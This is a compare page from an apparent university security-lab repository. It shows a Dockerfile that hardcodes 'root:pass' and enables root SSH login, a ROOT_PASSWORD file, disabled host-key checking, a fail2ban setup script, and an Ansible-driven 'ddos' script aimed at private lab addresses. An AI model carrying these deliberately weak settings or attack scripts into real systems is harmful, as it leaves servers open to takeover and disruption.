cs131139
/
ask_2020_ade
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Compare commits

base: cs131139:d8727fe9bb6c35c6a27c1fa9c75bff255ca72a6b
Branches Tags
cs131139:master
...
compare: cs131139:7c50890c4ef87408f6fd24e51ba8314a4608d0f0
Branches Tags
cs131139:master

No commits in common. 'd8727fe9bb6c35c6a27c1fa9c75bff255ca72a6b' and '7c50890c4ef87408f6fd24e51ba8314a4608d0f0' have entirely different histories.
d8727fe9bb ... 7c50890c4e

80 changed files with 18784 additions and 617 deletions
Whitespace
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Split View
Diff Options
Show Stats
  1. 15
      .vimrc
  2. 33
      Dockerfile
  3. 614
      LICENSE
  4. 3
      README.md
  5. 1
      ROOT_PASSWORD
  6. 11
      auto_update_hosts
  7. 35
      backup_files/ansible_cfg_text
  8. 2
      backup_files/ddos_atck_script.sh
  9. 28
      backup_files/fail2ban_script.sh
  10. 19
      backup_files/first_script.sh
  11. 1
      backup_files/hello_world.sh
  12. 6
      backup_files/inventory.yml
  13. 5
      backup_files/inventory_w.yml
  14. 54
      backup_files/iptables_rules.sh
  15. 10
      backup_files/medusa_script.sh
  16. 5276
      backup_files/passwd_list.txt
  17. 2
      backup_files/run.sh
  18. 8
      backup_files/script_update.sh
  19. 2
      backup_files/second_script.sh
  20. 5
      backup_files/test.retry
  21. 112
      backup_files/test.yml
  22. 4
      backup_files/test2.retry
  23. 48
      backup_files/test2.yml
  24. 4
      backup_files/test3.retry
  25. 60
      backup_files/test3.yml
  26. 26
      backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
  27. 6
      backup_files/vpn+backup/create-user.sh
  28. 47
      backup_files/vpn+backup/create-vpn.sh
  29. 22
      backup_files/vpn+backup/rm-user.sh
  30. 30
      backup_files/vpn+backup/rm_my5.sh
  31. 2
      backup_files/vpn+backup/show-conn-user.sh
  32. 2
      backup_files/vpn+backup/show-user.sh
  33. 16
      backup_files/vpn+backup/vi-userfile.sh
  34. 899
      backup_files/workingjail.local
  35. 37
      docker-compose.yml
  36. 8
      get_hosts
  37. 74
      install-vim-plugin.sh
  38. 108
      out.log
  39. 5275
      passwd_list
  40. 35
      project/ansible_cfg_text
  41. 2
      project/ansible_fail2ban.sh
  42. 2
      project/ansible_iptables.sh
  43. 2
      project/ddos_atck_script.sh
  44. 28
      project/fail2ban_script.sh
  45. 19
      project/first_script.sh
  46. 1
      project/hello_world.sh
  47. 6
      project/inventory.yml
  48. 5
      project/inventory_vpn.yml
  49. 5
      project/inventory_w.yml
  50. 54
      project/iptables_rules.sh
  51. 10
      project/medusa_script.sh
  52. 5276
      project/passwd_list.txt
  53. 2
      project/ping-to-me-vpn.sh
  54. 8
      project/script_update.sh
  55. 110
      project/sec_vpn_1.ovpn
  56. 110
      project/sec_vpn_2.ovpn
  57. 110
      project/sec_vpn_3.ovpn
  58. 110
      project/sec_vpn_4.ovpn
  59. 110
      project/sec_vpn_5.ovpn
  60. 2
      project/second_script.sh
  61. 4
      project/sshkey_script.sh
  62. 5
      project/test-ping.retry
  63. 27
      project/test-ping.yml
  64. 5
      project/test.retry
  65. 113
      project/test.yml
  66. 4
      project/test2.retry
  67. 76
      project/test2.yml
  68. 4
      project/test3.retry
  69. 60
      project/test3.yml
  70. 5
      project/test_fail2ban.retry
  71. 21
      project/test_fail2ban.yml
  72. 5
      project/test_iptables_rules.retry
  73. 21
      project/test_iptables_rules.yml
  74. 72
      sec_bootstrap
  75. 6
      shorewall/interfaces
  76. 11
      shorewall/policy
  77. 11
      shorewall/rules
  78. 6
      shorewall/zones
  79. 27
      ssh/id_rsa
  80. 1
      ssh/id_rsa.pub

15
.vimrc
View File

@ -0,0 +1,15 @@
map <C-e> :NERDTreeToggle<CR>
autocmd BufNewFile,BufRead *.vue,*.js set syntax=verilog tabstop=2|set shiftwidth=2|set noexpandtab autoindent
augroup remember_folds
autocmd!
autocmd BufWinLeave * mkview
autocmd BufWinEnter * silent! loadview
augroup END
" Useful for my Quick Notes feature in my tmuxrc
augroup QuickNotes
au BufWrite,VimLeave NOTES.otl mkview
au BufRead NOTES.otl silent loadview
augroup END
set swapfile
set dir=~/tmp

33
Dockerfile
View File

@ -0,0 +1,33 @@
FROM localhost:5000/sec
#
USER root
RUN export DEBIAN_FRONTEND=noninteractive && apt-get update && apt-get --no-install-recommends install -y openssh-server net-tools curl tcpdump shorewall sudo vim nmap dnsutils iputils-ping iptables wget python
RUN apt-get autoremove --purge && apt clean
RUN rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/run/sshd
RUN echo 'root:pass' | chpasswd
RUN sed -i 's/PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
#
# SSH login fix. Otherwise user is kicked off after login
RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd
#
ENV NOTVISIBLE "in users profile"
RUN echo "export VISIBLE=now" >> /etc/profile
#RUN wget -k https://raw.githubusercontent.com/egalpin/apt-vim/master/install.sh
#
#
#
COPY sec_bootstrap /usr/bin
COPY get_hosts /usr/bin
COPY auto_update_hosts /usr/bin
RUN mkdir -p /etc/shorewall
COPY shorewall /etc/shorewall
RUN mkdir -p /etc/opt
RUN mkdir -p /project
WORKDIR /project
COPY install-vim-plugin.sh .
#RUN bash ./install-vim-plugin.sh
#RUN apt-vim install -y https://github.com/scrooloose/nerdtree.git
RUN grep -qw ^docker /etc/passwd || useradd -m docker && echo "docker:docker" | chpasswd && adduser docker sudo
COPY .vimrc /home/docker
USER docker

614
LICENSE
View File

@ -1,614 +0,0 @@
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http s ://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies of this license
document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for software
and other kinds of works, specifically designed to ensure cooperation with
the community in the case of network server software.
The licenses for most software and other practical works are designed to take
away your freedom to share and change the works. By contrast, our General
Public Licenses are intended to guarantee your freedom to share and change
all versions of a program--to make sure it remains free software for all its
users.
When we speak of free software, we are referring to freedom, not price. Our
General Public Licenses are designed to make sure that you have the freedom
to distribute copies of free software (and charge for them if you wish), that
you receive source code or can get it if you want it, that you can change
the software or use pieces of it in new free programs, and that you know you
can do these things.
Developers that use our General Public Licenses protect your rights with two
steps: (1) assert copyright on the software, and (2) offer you this License
which gives you legal permission to copy, distribute and/or modify the software.
A secondary benefit of defending all users' freedom is that improvements made
in alternate versions of the program, if they receive widespread use, become
available for other developers to incorporate. Many developers of free software
are heartened and encouraged by the resulting cooperation. However, in the
case of software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and letting
the public access it on a server without ever releasing its source code to
the public.
The GNU Affero General Public License is designed specifically to ensure that,
in such cases, the modified source code becomes available to the community.
It requires the operator of a network server to provide the source code of
the modified version running there to the users of that server. Therefore,
public use of a modified version, on a publicly accessible server, gives the
public access to the source code of the modified version.
An older license, called the Affero General Public License and published by
Affero, was designed to accomplish similar goals. This is a different license,
not a version of the Affero GPL, but Affero has released a new version of
the Affero GPL which permits relicensing under this license.
The precise terms and conditions for copying, distribution and modification
follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of works,
such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this License.
Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals
or organizations.
To "modify" a work means to copy from or adapt all or part of the work in
a fashion requiring copyright permission, other than the making of an exact
copy. The resulting work is called a "modified version" of the earlier work
or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based on the
Program.
To "propagate" a work means to do anything with it that, without permission,
would make you directly or secondarily liable for infringement under applicable
copyright law, except executing it on a computer or modifying a private copy.
Propagation includes copying, distribution (with or without modification),
making available to the public, and in some countries other activities as
well.
To "convey" a work means any kind of propagation that enables other parties
to make or receive copies. Mere interaction with a user through a computer
network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices" to the
extent that it includes a convenient and prominently visible feature that
(1) displays an appropriate copyright notice, and (2) tells the user that
there is no warranty for the work (except to the extent that warranties are
provided), that licensees may convey the work under this License, and how
to view a copy of this License. If the interface presents a list of user commands
or options, such as a menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work for making
modifications to it. "Object code" means any non-source form of a work.
A "Standard Interface" means an interface that either is an official standard
defined by a recognized standards body, or, in the case of interfaces specified
for a particular programming language, one that is widely used among developers
working in that language.
The "System Libraries" of an executable work include anything, other than
the work as a whole, that (a) is included in the normal form of packaging
a Major Component, but which is not part of that Major Component, and (b)
serves only to enable use of the work with that Major Component, or to implement
a Standard Interface for which an implementation is available to the public
in source code form. A "Major Component", in this context, means a major essential
component (kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to produce
the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all the source
code needed to generate, install, and (for an executable work) run the object
code and to modify the work, including scripts to control those activities.
However, it does not include the work's System Libraries, or general-purpose
tools or generally available free programs which are used unmodified in performing
those activities but which are not part of the work. For example, Corresponding
Source includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically linked
subprograms that the work is specifically designed to require, such as by
intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users can regenerate
automatically from other parts of the Corresponding Source.
The Corresponding Source for a work in source code form is that same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of copyright
on the Program, and are irrevocable provided the stated conditions are met.
This License explicitly affirms your unlimited permission to run the unmodified
Program. The output from running a covered work is covered by this License
only if the output, given its content, constitutes a covered work. This License
acknowledges your rights of fair use or other equivalent, as provided by copyright
law.
You may make, run and propagate covered works that you do not convey, without
conditions so long as your license otherwise remains in force. You may convey
covered works to others for the sole purpose of having them make modifications
exclusively for you, or provide you with facilities for running those works,
provided that you comply with the terms of this License in conveying all material
for which you do not control copyright. Those thus making or running the covered
works for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of your copyrighted
material outside their relationship with you.
Conveying under any other circumstances is permitted solely under the conditions
stated below. Sublicensing is not allowed; section 10 makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological measure
under any applicable law fulfilling obligations under article 11 of the WIPO
copyright treaty adopted on 20 December 1996, or similar laws prohibiting
or restricting circumvention of such measures.
When you convey a covered work, you waive any legal power to forbid circumvention
of technological measures to the extent such circumvention is effected by
exercising rights under this License with respect to the covered work, and
you disclaim any intention to limit operation or modification of the work
as a means of enforcing, against the work's users, your or third parties'
legal rights to forbid circumvention of technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you receive
it, in any medium, provided that you conspicuously and appropriately publish
on each copy an appropriate copyright notice; keep intact all notices stating
that this License and any non-permissive terms added in accord with section
7 apply to the code; keep intact all notices of the absence of any warranty;
and give all recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey, and you
may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to produce
it from the Program, in the form of source code under the terms of section
4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified it, and
giving a relevant date.
b) The work must carry prominent notices stating that it is released under
this License and any conditions added under section 7. This requirement modifies
the requirement in section 4 to "keep intact all notices".
c) You must license the entire work, as a whole, under this License to anyone
who comes into possession of a copy. This License will therefore apply, along
with any applicable section 7 additional terms, to the whole of the work,
and all its parts, regardless of how they are packaged. This License gives
no permission to license the work in any other way, but it does not invalidate
such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display Appropriate
Legal Notices; however, if the Program has interactive interfaces that do
not display Appropriate Legal Notices, your work need not make them do so.
A compilation of a covered work with other separate and independent works,
which are not by their nature extensions of the covered work, and which are
not combined with it such as to form a larger program, in or on a volume of
a storage or distribution medium, is called an "aggregate" if the compilation
and its resulting copyright are not used to limit the access or legal rights
of the compilation's users beyond what the individual works permit. Inclusion
of a covered work in an aggregate does not cause this License to apply to
the other parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms of sections
4 and 5, provided that you also convey the machine-readable Corresponding
Source under the terms of this License, in one of these ways:
a) Convey the object code in, or embodied in, a physical product (including
a physical distribution medium), accompanied by the Corresponding Source fixed
on a durable physical medium customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product (including
a physical distribution medium), accompanied by a written offer, valid for
at least three years and valid for as long as you offer spare parts or customer
support for that product model, to give anyone who possesses the object code
either (1) a copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical medium customarily
used for software interchange, for a price no more than your reasonable cost
of physically performing this conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the written
offer to provide the Corresponding Source. This alternative is allowed only
occasionally and noncommercially, and only if you received the object code
with such an offer, in accord with subsection 6b.
d) Convey the object code by offering access from a designated place (gratis
or for a charge), and offer equivalent access to the Corresponding Source
in the same way through the same place at no further charge. You need not
require recipients to copy the Corresponding Source along with the object
code. If the place to copy the object code is a network server, the Corresponding
Source may be on a different server (operated by you or a third party) that
supports equivalent copying facilities, provided you maintain clear directions
next to the object code saying where to find the Corresponding Source. Regardless
of what server hosts the Corresponding Source, you remain obligated to ensure
that it is available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided you inform
other peers where the object code and Corresponding Source of the work are
being offered to the general public at no charge under subsection 6d.
A separable portion of the object code, whose source code is excluded from
the Corresponding Source as a System Library, need not be included in conveying
the object code work.
A "User Product" is either (1) a "consumer product", which means any tangible
personal property which is normally used for personal, family, or household
purposes, or (2) anything designed or sold for incorporation into a dwelling.
In determining whether a product is a consumer product, doubtful cases shall
be resolved in favor of coverage. For a particular product received by a particular
user, "normally used" refers to a typical or common use of that class of product,
regardless of the status of the particular user or of the way in which the
particular user actually uses, or expects or is expected to use, the product.
A product is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent the
only significant mode of use of the product.
"Installation Information" for a User Product means any methods, procedures,
authorization keys, or other information required to install and execute modified
versions of a covered work in that User Product from a modified version of
its Corresponding Source. The information must suffice to ensure that the
continued functioning of the modified object code is in no case prevented
or interfered with solely because modification has been made.
If you convey an object code work under this section in, or with, or specifically
for use in, a User Product, and the conveying occurs as part of a transaction
in which the right of possession and use of the User Product is transferred
to the recipient in perpetuity or for a fixed term (regardless of how the
transaction is characterized), the Corresponding Source conveyed under this
section must be accompanied by the Installation Information. But this requirement
does not apply if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has been installed
in ROM).
The requirement to provide Installation Information does not include a requirement
to continue to provide support service, warranty, or updates for a work that
has been modified or installed by the recipient, or for the User Product in
which it has been modified or installed. Access to a network may be denied
when the modification itself materially and adversely affects the operation
of the network or violates the rules and protocols for communication across
the network.
Corresponding Source conveyed, and Installation Information provided, in accord
with this section must be in a format that is publicly documented (and with
an implementation available to the public in source code form), and must require
no special password or key for unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this License
by making exceptions from one or more of its conditions. Additional permissions
that are applicable to the entire Program shall be treated as though they
were included in this License, to the extent that they are valid under applicable
law. If additional permissions apply only to part of the Program, that part
may be used separately under those permissions, but the entire Program remains
governed by this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option remove any
additional permissions from that copy, or from any part of it. (Additional
permissions may be written to require their own removal in certain cases when
you modify the work.) You may place additional permissions on material, added
by you to a covered work, for which you have or can give appropriate copyright
permission.
Notwithstanding any other provision of this License, for material you add
to a covered work, you may (if authorized by the copyright holders of that
material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the terms of
sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or author
attributions in that material or in the Appropriate Legal Notices displayed
by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or requiring
that modified versions of such material be marked in reasonable ways as different
from the original version; or
d) Limiting the use for publicity purposes of names of licensors or authors
of the material; or
e) Declining to grant rights under trademark law for use of some trade names,
trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that material by
anyone who conveys the material (or modified versions of it) with contractual
assumptions of liability to the recipient, for any liability that these contractual
assumptions directly impose on those licensors and authors.
All other non-permissive additional terms are considered "further restrictions"
within the meaning of section 10. If the Program as you received it, or any
part of it, contains a notice stating that it is governed by this License
along with a term that is a further restriction, you may remove that term.
If a license document contains a further restriction but permits relicensing
or conveying under this License, you may add to a covered work material governed
by the terms of that license document, provided that the further restriction
does not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you must place,
in the relevant source files, a statement of the additional terms that apply
to those files, or a notice indicating where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the form
of a separately written license, or stated as exceptions; the above requirements
apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly provided
under this License. Any attempt otherwise to propagate or modify it is void,
and will automatically terminate your rights under this License (including
any patent licenses granted under the third paragraph of section 11).
However, if you cease all violation of this License, then your license from
a particular copyright holder is reinstated (a) provisionally, unless and
until the copyright holder explicitly and finally terminates your license,
and (b) permanently, if the copyright holder fails to notify you of the violation
by some reasonable means prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is reinstated permanently
if the copyright holder notifies you of the violation by some reasonable means,
this is the first time you have received notice of violation of this License
(for any work) from that copyright holder, and you cure the violation prior
to 30 days after your receipt of the notice.
Termination of your rights under this section does not terminate the licenses
of parties who have received copies or rights from you under this License.
If your rights have been terminated and not permanently reinstated, you do
not qualify to receive new licenses for the same material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or run a copy
of the Program. Ancillary propagation of a covered work occurring solely as
a consequence of using peer-to-peer transmission to receive a copy likewise
does not require acceptance. However, nothing other than this License grants
you permission to propagate or modify any covered work. These actions infringe
copyright if you do not accept this License. Therefore, by modifying or propagating
a covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically receives
a license from the original licensors, to run, modify and propagate that work,
subject to this License. You are not responsible for enforcing compliance
by third parties with this License.
An "entity transaction" is a transaction transferring control of an organization,
or substantially all assets of one, or subdividing an organization, or merging
organizations. If propagation of a covered work results from an entity transaction,
each party to that transaction who receives a copy of the work also receives
whatever licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the Corresponding
Source of the work from the predecessor in interest, if the predecessor has
it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the rights
granted or affirmed under this License. For example, you may not impose a
license fee, royalty, or other charge for exercise of rights granted under
this License, and you may not initiate litigation (including a cross-claim
or counterclaim in a lawsuit) alleging that any patent claim is infringed
by making, using, selling, offering for sale, or importing the Program or
any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this License
of the Program or a work on which the Program is based. The work thus licensed
is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims owned or controlled
by the contributor, whether already acquired or hereafter acquired, that would
be infringed by some manner, permitted by this License, of making, using,
or selling its contributor version, but do not include claims that would be
infringed only as a consequence of further modification of the contributor
version. For purposes of this definition, "control" includes the right to
grant patent sublicenses in a manner consistent with the requirements of this
License.
Each contributor grants you a non-exclusive, worldwide, royalty-free patent
license under the contributor's essential patent claims, to make, use, sell,
offer for sale, import and otherwise run, modify and propagate the contents
of its contributor version.
In the following three paragraphs, a "patent license" is any express agreement
or commitment, however denominated, not to enforce a patent (such as an express
permission to practice a patent or covenant not to s ue for patent infringement).
To "grant" such a patent license to a party means to make such an agreement
or commitment not to enforce a patent against the party.
If you convey a covered work, knowingly relying on a patent license, and the
Corresponding Source of the work is not available for anyone to copy, free
of charge and under the terms of this License, through a publicly available
network server or other readily accessible means, then you must either (1)
cause the Corresponding Source to be so available, or (2) arrange to deprive
yourself of the benefit of the patent license for this particular work, or
(3) arrange, in a manner consistent with the requirements of this License,
to extend the patent
license to downstream recipients. "Knowingly relying" means you have actual
knowledge that, but for the patent license, your conveying the covered work
in a country, or your recipient's use of the covered work in a country, would
infringe one or more identifiable patents in that country that you have reason
to believe are valid.
If, pursuant to or in connection with a single transaction or arrangement,
you convey, or propagate by procuring conveyance of, a covered work, and grant
a patent license to some of the parties receiving the covered work authorizing
them to use, propagate, modify or convey a specific copy of the covered work,
then the patent license you grant is automatically extended to all recipients
of the covered work and works based on it.
A patent license is "discriminatory" if it does not include within the scope
of its coverage, prohibits the exercise of, or is conditioned on the non-exercise
of one or more of the rights that are specifically granted under this License.
You may not convey a covered work if you are a party to an arrangement with
a third party that is in the business of distributing software, under which
you make payment to the third party based on the extent of your activity of
conveying the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory patent
license (a) in connection with copies of the covered work conveyed by you
(or copies made from those copies), or (b) primarily for and in connection
with specific products or compilations that contain the covered work, unless
you entered into that arrangement, or that patent license was granted, prior
to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting any implied
license or other defenses to infringement that may otherwise be available
to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot convey a covered work so as
to satisfy simultaneously your obligations under this License and any other
pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey the
Program, the only way you could satisfy both those terms and this License
would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the Program,
your modified version must prominently offer all users interacting with it
remotely through a computer network (if your version supports such interaction)
an opportunity to receive the Corresponding Source of your version by providing
access to the Corresponding Source from a network server at no charge, through
some standard or customary means of facilitating copying of software. This
Corresponding Source shall include the Corresponding Source for any work covered
by version 3 of the GNU General Public License that is incorporated pursuant
to the following paragraph.
Notwithstanding any other provision of this License, you have permission to
link or combine any covered work with a work licensed under version 3 of the
GNU General Public License into a single combined work, and to convey the
resulting work. The terms of this License will continue to apply to the part
which is the covered work, but the work with which it is combined will remain
governed by version 3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of the
GNU Affero General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to address
new problems or concerns.
Each version is given a distinguishing version number. If the Program specifies
that a certain numbered version of the GNU Affero General Public License "or
any later version" applies to it, you have the option of following the terms
and conditions either of that numbered version or of any later version published
by the Free Software Foundation. If the Program does not specify a version
number of the GNU Affero General Public License, you may choose any version
ever published by the Free Software Foundation.
If the Program specifies that a proxy can decide which future versions of
the GNU Affero General Public License can be used, that proxy's public statement
of acceptance of a version permanently authorizes you to choose that version
for the Program.
Later license versions may give you additional or different permissions. However,
no additional obligations are imposed on any author or copyright holder as
a result of your choosing to follow a later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE
LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER
EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM
PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR
CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM
AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,
INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO
USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED
INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE
PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER
PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided above cannot
be given local legal effect according to their terms, reviewing courts shall
apply local law that most closely approximates an absolute waiver of all civil
liability in connection with the Program, unless a warranty or assumption
of liability accompanies a copy of the Program in return for a fee. END OF
TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest possible
use to the public, the best way to achieve this is to make it free software
which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest to attach
them to the start of each source file to most effectively state the exclusion
of warranty; and each file should have at least the "copyright" line and a
pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU Affero General Public License as published by the Free
Software Foundation, either version 3 of the License, or (at your option)
any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
details.
You should have received a copy of the GNU Affero General Public License along
with this program. If not, see <http s ://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer network,
you should also make sure that it provides a way for users to get its source.
For example, if your program is a web application, its interface could display
a "Source" link that leads users to an archive of the code. There are many
ways you could offer source, and different solutions will be better for different
programs; see section 13 for the specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary. For
more information on this, and how to apply and follow the GNU AGPL, see <http
s ://www.gnu.org/licenses/>.

3
README.md
View File

@ -1,3 +0,0 @@
# ask_2020_ade
Uniwa 2020 ask Security

1
ROOT_PASSWORD
View File

@ -0,0 +1 @@
ROOT_PASSWORD="pass"

11
auto_update_hosts
View File

@ -0,0 +1,11 @@
#!/bin/sh
hosts=$(get_hosts)
printf "%s" "$hosts" > "$1"
while sleep 2
do
current_hosts=$(get_hosts)
[ "$hosts" != "$current_hosts" ] && printf "%s" "$current_hosts" > "$1"
hosts=$current_hosts
done

35
backup_files/ansible_cfg_text
View File

@ -0,0 +1,35 @@
# config file for ansible -- https://ansible.com/
# ===============================================
# nearly all parameters can be overridden in ansible-playbook
# or with command line flags. ansible will read ANSIBLE_CONFIG,
# ansible.cfg in the current working directory, .ansible.cfg in
# the home directory or /etc/ansible/ansible.cfg, whichever it
# finds first
[defaults]
host_key_checking = False
# some basic default values...
#inventory = /etc/ansible/hosts
#library = /usr/share/my_modules/
#module_utils = /usr/share/my_module_utils/
#remote_tmp = ~/.ansible/tmp
#local_tmp = ~/.ansible/tmp
#plugin_filters_cfg = /etc/ansible/plugin_filters.yml
#forks = 5
#poll_interval = 15
#sudo_user = root
#ask_sudo_pass = True
#ask_pass = True
#transport = smart
#remote_port = 22
#module_lang = C
#module_set_locale = False
# plays will gather facts by default, which contain information about
# the remote system.
#
# smart - gather by default, but don't regather if already gathered

2
backup_files/ddos_atck_script.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory_w.yml test3.yml -f 4 --ask-pass --ask-become-pass

28
backup_files/fail2ban_script.sh
View File

@ -0,0 +1,28 @@
#!/bin/sh
sudo apt-get update -y # To get the latest package lists
sudo apt install rsyslog #instal auth.log
sudo service rsyslog start #start syslog
#grep "Failed password" /var/log/auth.log #check for login failures
#grep "Failed password" /var/log/auth.log | awk ‘{print $11}’ | uniq -c | sort
sudo cat /var/log/auth.log | grep "Failed password"
sudo apt install fail2ban -y
sudo service fail2ban enable
sudo service fail2ban start
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo sed -i '244d' /etc/fail2ban/jail.local
sudo sed -i '239 a enabled = true' /etc/fail2ban/jail.local
sudo sed -i '240 a maxretry = 3' /etc/fail2ban/jail.local
sudo sed -i '241 a bantime = 300' /etc/fail2ban/jail.local
sudo sed -i '242 a findtime = 30' /etc/fail2ban/jail.local
sudo sed -i '243 a chain = INPUT' /etc/fail2ban/jail.local
sudo sed -i '244 a port = 22' /etc/fail2ban/jail.local
sudo sed -i '245 a action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]' /etc/fail2ban/jail.local
sudo service fail2ban restart
sudo fail2ban-client status sshd
sudo iptables -L

19
backup_files/first_script.sh
View File

@ -0,0 +1,19 @@
#!/bin/sh
#nmap -n -sn 172.25.0.* -oG - | awk '/Up$/{print $2}'
sudo apt-get update -y # To get the latest package lists
sudo apt install ansible -y
sudo apt install sshpass -y
sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg
ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
#sudo tcpdump -i eth0
#now interrupt the process. get its PID:
#pid=$(ps -e | pgrep tcpdump)
#echo $pid
#
#interrupt it:
#sleep 5
#kill -2 $pid

1
backup_files/hello_world.sh
View File

@ -0,0 +1 @@
echo "Hello World"

6
backup_files/inventory.yml
View File

@ -0,0 +1,6 @@
[service]
172.21.0.2
172.21.0.3
172.21.0.4
172.21.0.5
172.21.0.6

5
backup_files/inventory_w.yml
View File

@ -0,0 +1,5 @@
[service]
172.21.0.3
